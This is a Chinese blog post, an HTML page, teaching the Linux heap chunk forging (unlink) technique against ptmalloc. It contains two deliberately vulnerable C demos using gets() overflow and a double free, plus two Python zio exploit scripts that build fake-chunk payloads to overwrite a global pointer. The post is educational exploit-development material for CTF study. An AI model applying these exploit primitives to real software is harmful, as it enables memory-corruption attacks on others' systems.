<!DOCTYPE html>
<html lang="en">

<!-- Head tag -->
<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content="follow your heart!fly your dream!">
    <meta name="keyword" content="">
    <meta name="theme-color" content="#600090">
    <meta name="msapplication-navbutton-color" content="#600090">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="#600090">
    <link rel="shortcut icon" href="https://cdn4.iconfinder.com/data/icons/ionicons/512/icon-person-128.png">
    <link rel="alternate" type="application/atom+xml" title="拾荒者CD" href="/atom.xml">
    <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/animate.css/3.5.2/animate.min.css">
    <link rel="stylesheet" href="//cdn.bootcss.com/font-awesome/4.6.3/css/font-awesome.css">
    <title>
        
        Linux Pwn 之堆块伪造技术｜undefined
        
    </title>

    <link rel="canonical" href="http://gumeng.fun/2018/06/15/20180615-Linux下的堆块伪造/">

    <!-- Bootstrap Core CSS -->
    <link rel="stylesheet" href="/css/bootstrap.min.css">

    <!-- Custom CSS -->
    <link rel="stylesheet" href="/css/blog-style.css">

    <!-- Pygments Github CSS -->
    <link rel="stylesheet" href="/css/syntax.css">
<link rel="stylesheet" href="/css/prism.css" type="text/css"></head>

<style>

    header.intro-header {
        background-image: url('')
    }
</style>
<!-- hack iOS CSS :active style -->
<body ontouchstart="" class="animated fadeIn">
<!-- Navigation -->
<nav class="navbar navbar-default navbar-custom navbar-fixed-top " id="nav-top" data-ispost="true" data-istags="false
" data-ishome="false">
    <div class="container-fluid">
        <!-- Brand and toggle get grouped for better mobile display -->
        <div class="navbar-header page-scroll">
            <button type="button" class="navbar-toggle">
                <span class="sr-only">Toggle navigation</span>
                <span class="icon-bar"></span>
                <span class="icon-bar"></span>
                <span class="icon-bar"></span>
            </button>
            <a class="navbar-brand animated pulse" href="/">
                <span class="brand-logo">
                    拾荒者CD
                </span>
                's Blog
            </a>
        </div>

        <!-- Collect the nav links, forms, and other content for toggling -->
        <!-- Known Issue, found by Hux:
            <nav>'s height woule be hold on by its content.
            so, when navbar scale out, the <nav> will cover tags.
            also mask any touch event of tags, unfortunately.
        -->
        <!-- /.navbar-collapse -->
        <div id="huxblog_navbar">
            <div class="navbar-collapse">
                <ul class="nav navbar-nav navbar-right">
                    <li>
                        <a href="/">Home</a>
                    </li>
					
                    
                        
							
                        <li>
                            <a href="/aboutme/">关于我和我的博客</a>
                        </li>
							
						
                    
                        
							
								
							
						
                    
					
					
						<li>
							<a href="/about">About</a>
						</li>
					
                </ul>
            </div>
        </div>
    </div>
    <!-- /.container -->
</nav>
<script>
    // Drop Bootstarp low-performance Navbar
    // Use customize navbar with high-quality material design animation
    // in high-perf jank-free CSS3 implementation
//    var $body   = document.body;
    var $toggle = document.querySelector('.navbar-toggle');
    var $navbar = document.querySelector('#huxblog_navbar');
    var $collapse = document.querySelector('.navbar-collapse');

    $toggle.addEventListener('click', handleMagic)
    function handleMagic(e){
        if ($navbar.className.indexOf('in') > 0) {
        // CLOSE
            $navbar.className = " ";
            // wait until animation end.
            setTimeout(function(){
                // prevent frequently toggle
                if($navbar.className.indexOf('in') < 0) {
                    $collapse.style.height = "0px"
                }
            },400)
        }else{
        // OPEN
            $collapse.style.height = "auto"
            $navbar.className += " in";
        }
    }
</script>

<!-- Main Content -->

<!--only post-->


<img class="wechat-title-img" src="">


<style>
    
    header.intro-header {
        background-image: url('')
    }

    
</style>

<header class="intro-header">
    <div class="container">
        <div class="row">
            <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1 text-center">
                <div class="post-heading">
                    <h1>Linux Pwn 之堆块伪造技术</h1>
                    
                    <span class="meta">
                         作者 gumeng
                        <span>
                          日期 2018-06-15
                         </span>
                    </span>
                    <div class="tags text-center">
                        
                        <a class="tag" href="/tags/#Exploit" title="Exploit">Exploit</a>
                        
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="post-title-haojen">
        <span>
            Linux Pwn 之堆块伪造技术
        </span>
    </div>
</header>

<!-- Post Content -->
<article>
    <div class="container">
        <div class="row">
            <!-- Post Container -->
            <div class="col-lg-8 col-lg-offset-1 col-sm-9 post-container">
                <p>借鉴下别人的文章，如有冒犯，还望多多包涵</p>
<h1 id="Linux下的堆块伪造"><a href="#Linux下的堆块伪造" class="headerlink" title="Linux下的堆块伪造"></a>Linux下的堆块伪造</h1><p>这是一个基本的堆利用技巧，很多堆利用的地方都会用到。比如double free。<br>这种利用方式的出现是由于unlink的check机制的出现。这里主要从堆溢出和double free两个角度谈一下。</p>
<h2 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h2><p>1.ptmalloc的相邻空块合并原则。<br>2.堆chunk本身的结构机制。</p>
<h2 id="详解"><a href="#详解" class="headerlink" title="详解"></a>详解</h2><p>堆chunk判断一个块是否为空仅仅依赖于相邻后块的<strong>prev_size</strong>和<strong>最低flag位</strong>。<br>如果在堆上构造合理的堆块结构，那么堆管理机制就会误以为我们的伪造的堆块是真正的空堆块。<br>当释放掉相邻的后块时（这个块是真的），就会触发空块合并。也就达成了堆块伪造的目的。</p>
<h2 id="要求"><a href="#要求" class="headerlink" title="要求"></a>要求</h2><figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1.</span>有两个相邻的堆块</span><br><span class="line"><span class="number">2.</span>第一个堆块可溢出第二个</span><br><span class="line"><span class="number">3.</span>释放第二个堆，即可触发。</span><br></pre></td></tr></table></figure>
<p>这种是最常见的利用，即有check的堆溢出利用。</p>
<p>或者</p>
<figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1.</span>有一个已分配的堆</span><br><span class="line"><span class="number">2.</span>有一个指向堆上的可控指针</span><br><span class="line"><span class="number">3.</span>free参数可控</span><br></pre></td></tr></table></figure>
<p>这种情况下，是在分配的一大块堆中强行构造出两块chunk。然后利用那个指向堆上的可控指针来实现free触发漏洞。<br>这其实是一种double free的利用方式，因为如果你分配了两块堆，然后把这两块堆都释放之后，这些内存会合并到top chunk中。当再次分配堆的时候，还是使用这些内存地址。</p>
<p>那么如果我们进行以下操作：</p>
<figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1.</span>分配两个堆</span><br><span class="line"><span class="number">2.</span>释放掉这两个堆</span><br><span class="line"><span class="number">3.</span>分配一个可以包含住前面两个堆的大堆块</span><br><span class="line"><span class="number">4.</span>写入这个大堆块构造两个伪chunk</span><br><span class="line"><span class="number">5.</span>通过第<span class="number">2</span>步中释放两个堆</span><br></pre></td></tr></table></figure>
<p>这样对于初始的两个堆来说，就像是double free了，当然本质还是堆块伪造。</p>
<h2 id="利用的效果"><a href="#利用的效果" class="headerlink" title="利用的效果"></a>利用的效果</h2><p>如果成功的使用了伪造堆，那么达到的效果是什么呢？首先，是不可能像unlink利用一样任意地址写了。<br>因为对于目前的ptmalloc来说，有如下check：<br>current-&gt;fd-&gt;bd!=current;<br>current-&gt;bd-&gt;fd!=current;<br>为了过掉这个检验我们会用一个指向堆块的全局指针的地址的一个偏移作为伪chunk的fd。<br>fd=ptr-12;<br>bd=ptr-8;<br>然后在断链的过程中，就会把<strong>ptr</strong>的值改成<strong>&amp;ptr-12</strong>,感觉很鸡肋是吧？<br>毕竟费这么大力气只是把一个全局变量的值给改成了他的地址－0xC，但是这个东西确实是这么去利用的。<br>在CTF中会跟其他的漏洞或功能结合去使用。</p>
<h2 id="两个演示的DEMO"><a href="#两个演示的DEMO" class="headerlink" title="两个演示的DEMO"></a>两个演示的DEMO</h2><p>为了具体的说明问题，这里写了两个demo演示效果。</p>
<h3 id="Demo1"><a href="#Demo1" class="headerlink" title="Demo1"></a>Demo1</h3><figure class="highlight plain"><figcaption><span>*global[80];</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">void *global[80];</span><br><span class="line"></span><br><span class="line">int main(void)</span><br><span class="line">&#123;</span><br><span class="line">    void *p1,*p2;</span><br><span class="line">    p1=malloc(200);</span><br><span class="line">    p2=malloc(200);</span><br><span class="line">    global[40]=p1;</span><br><span class="line">    printf(&quot;before exploit:%x\n&quot;,global[40]);</span><br><span class="line">    puts(&quot;read&quot;);//for debug</span><br><span class="line">    gets(p1);//overflow</span><br><span class="line">    free(p2);</span><br><span class="line">    printf(&quot;after exploit:%x\n&quot;,global[40]);</span><br><span class="line">    return 0;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这是对应于第一种堆溢出覆盖下一块堆的情况的，如果使用下面的exp就会发现global中malloc返回的地址已经变成了 global[40]本身的地址－0xC</p>
<figure class="highlight plain"><figcaption><span>zio import *</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">io=zio(&apos;./h1&apos;,timeout=9999)</span><br><span class="line">#io.gdb_hint()</span><br><span class="line">io.read_until(&apos;read&apos;)</span><br><span class="line">sc=l32(0x0)+l32(0xc9)+l32(0x804A100-0xc)+l32(0x0804A100-0x8)+&apos;a&apos;*(200-16)+l32(0xc8)+l32(0xd0)</span><br><span class="line">io.writeline(sc)</span><br><span class="line">io.read()</span><br></pre></td></tr></table></figure>
<h3 id="Demo2"><a href="#Demo2" class="headerlink" title="Demo2"></a>Demo2</h3><figure class="highlight plain"><figcaption><span>*global[40];</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">int main(void)</span><br><span class="line">&#123;</span><br><span class="line">  void *p1,*p2,*p3;</span><br><span class="line">  p1=malloc(200);</span><br><span class="line">  p2=malloc(200);</span><br><span class="line">  global[20]=p1;</span><br><span class="line">  free(p1);</span><br><span class="line">  free(p2);</span><br><span class="line">  p3=malloc(500);</span><br><span class="line">  puts(&quot;get&quot;);//for debug</span><br><span class="line">  gets(p3);</span><br><span class="line">  free(p2);</span><br><span class="line">  return;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这个Demo展示的是double free。可以看到对于p2指针来说确实是释放了两次。</p>
<figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">from zio import *</span><br><span class="line">io=zio('./h2',timeout=<span class="number">99999</span>)</span><br><span class="line">#io.gdb_hint()</span><br><span class="line">io.read_until('get')</span><br><span class="line">sc=l32(<span class="number">0x0</span>)+l32(<span class="number">201</span>)+l32(<span class="number">0x804a0b0</span><span class="number">-0xC</span>)+l32(<span class="number">0x804a0b0</span><span class="number">-0x8</span>)+'a'*(<span class="number">200</span><span class="number">-16</span>)+l32(<span class="number">200</span>)+l32(<span class="number">0x128</span>)</span><br><span class="line">io.writeline(sc)</span><br><span class="line">io.read()</span><br></pre></td></tr></table></figure>
<p>这个exp就可以实现利用，感觉这个exp的伪堆块构造要比上面Demo更复杂一些。这个exp我搞了好久，因为不知道为什么一直会触发free的check导致程序崩溃。后来查了一些资料终于明白了，必须要保证你分配的堆与你在其中构造的两个堆块的大小完全一致。<br>比方说我这里是malloc(500)，调试一下发现分配了504（鬼知道为什么），那么就是504-8-200=0x128，如果不跟分配的堆块边境符合的话就会触发check从而crash掉。</p>
<p>by:Ox9A82</p>

                <hr>
                

                <ul class="pager">
                    
                    <li class="previous">
                        <a href="/2018/06/15/20180615-GDB_peda插件使用指南/" data-toggle="tooltip" data-placement="top" title="GDB_PEDA Exploit 调试插件安装">&larr; Previous Post</a>
                    </li>
                    
                    
                    <li class="next">
                        <a href="/2018/06/15/20180615-peda-pwntools安装使用问题/" data-toggle="tooltip" data-placement="top" title="Peda 安装指南">Next Post &rarr;</a>
                    </li>
                    
                </ul>

                

                


                <!--加入新的评论系统-->
                

                

            </div>

            <div class="hidden-xs col-sm-3 toc-col">
                <div class="toc-wrap">
                    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Linux下的堆块伪造"><span class="toc-text">Linux下的堆块伪造</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#原理"><span class="toc-text">原理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#详解"><span class="toc-text">详解</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#要求"><span class="toc-text">要求</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#利用的效果"><span class="toc-text">利用的效果</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#两个演示的DEMO"><span class="toc-text">两个演示的DEMO</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Demo1"><span class="toc-text">Demo1</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Demo2"><span class="toc-text">Demo2</span></a></li></ol></li></ol></li></ol>
                </div>
            </div>
        </div>

        <div class="row">
            <!-- Sidebar Container -->

            <div class="
                col-lg-8 col-lg-offset-2
                col-md-10 col-md-offset-1
                sidebar-container">

                <!-- Featured Tags -->
                

                <!-- Friends Blog -->
                
            </div>
        </div>

    </div>
</article>







<!-- Footer -->
<!-- Footer -->
<footer>
    <div class="container">
        <div class="row">
            <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1 text-center">
                <br>
                <ul class="list-inline text-center">
                
                
                

                

                

                

                

                </ul>
                <p class="copyright text-muted">
                    Copyright &copy; 拾荒者CD 2022
                    <br>
                    <span id="busuanzi_container_site_pv" style="font-size: 12px;">PV: <span id="busuanzi_value_site_pv"></span> Times</span>
                    <br>
                    Theme by <a href="https://haojen.github.io/">Haojen Ma</a>
                </p>

            </div>
        </div>
    </div>
</footer>

<!-- jQuery -->
<script src="/js/jquery.min.js"></script>

<!-- Bootstrap Core JavaScript -->
<script src="/js/bootstrap.min.js"></script>

<!-- Custom Theme JavaScript -->
<script src="/js/blog.js"></script>

<!-- async load function -->
<script>
    function async(u, c) {
      var d = document, t = 'script',
          o = d.createElement(t),
          s = d.getElementsByTagName(t)[0];
      o.src = u;
      if (c) { o.addEventListener('load', function (e) { c(null, e); }, false); }
      s.parentNode.insertBefore(o, s);
    }
</script>

<!-- jquery.tagcloud.js -->
<script>
    // only load tagcloud.js in tag.html
    if($('#tag_cloud').length !== 0){
        async("http://gumeng.fun/js/jquery.tagcloud.js",function(){
            $.fn.tagcloud.defaults = {
                //size: {start: 1, end: 1, unit: 'em'},
                color: {start: '#bbbbee', end: '#0085a1'},
            };
            $('#tag_cloud a').tagcloud();
        })
    }
</script>

<!--fastClick.js -->
<script>
    async("//cdn.bootcss.com/fastclick/1.0.6/fastclick.min.js", function(){
        var $nav = document.querySelector("nav");
        if($nav) FastClick.attach($nav);
    })
</script>



<!-- Google Analytics -->



<!-- Baidu Tongji -->


<!-- swiftype -->
<script type="text/javascript">
  (function(w,d,t,u,n,s,e){w['SwiftypeObject']=n;w[n]=w[n]||function(){
  (w[n].q=w[n].q||[]).push(arguments);};s=d.createElement(t);
  e=d.getElementsByTagName(t)[0];s.async=1;s.src=u;e.parentNode.insertBefore(s,e);
  })(window,document,'script','//s.swiftypecdn.com/install/v2/st.js','_st');

  _st('install','','2.0.0');
</script>

<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

<!--wechat title img-->
<img class="wechat-title-img" src="">
</body>

</html>
